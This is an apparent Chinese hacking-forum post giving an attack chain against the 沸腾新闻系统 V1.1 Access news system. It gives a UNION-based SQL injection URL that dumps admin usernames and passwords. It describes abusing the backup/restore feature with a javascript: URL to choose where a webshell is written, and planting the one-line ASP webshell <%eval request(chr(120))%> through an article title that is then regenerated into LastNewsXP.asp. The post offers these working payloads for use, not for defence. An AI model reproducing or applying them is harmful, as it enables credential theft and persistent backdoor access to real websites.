沸腾新闻系统 V1.1 Access版 Finish(SP2) 注入利用
<P>+ News.asp?click=1&shu=20 1 as NewsID,username as title,3 as updatetime,passwd as click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin union select top 2</P><P><BR>后台“图文管理”里添加文章,上传一个flash文件<BR>点附加管理里的备份压缩<BR>数据库地址为只读<BR>打开恢复数据库窗口。IE输入<BR>javascript:alert(window.frames <BR>.document.forms.backpath.value="/data/x.asp");<BR>就可自定义马的地址了</P><P>也可以在后台添加一个文章,标题为<%eval request(chr(120))%><BR>然后访问CreateASP.asp更新LastNewsXP.asp这个文件<BR>后门就写到LastNewsXP.asp里面了 <BR></P>
页:
[1]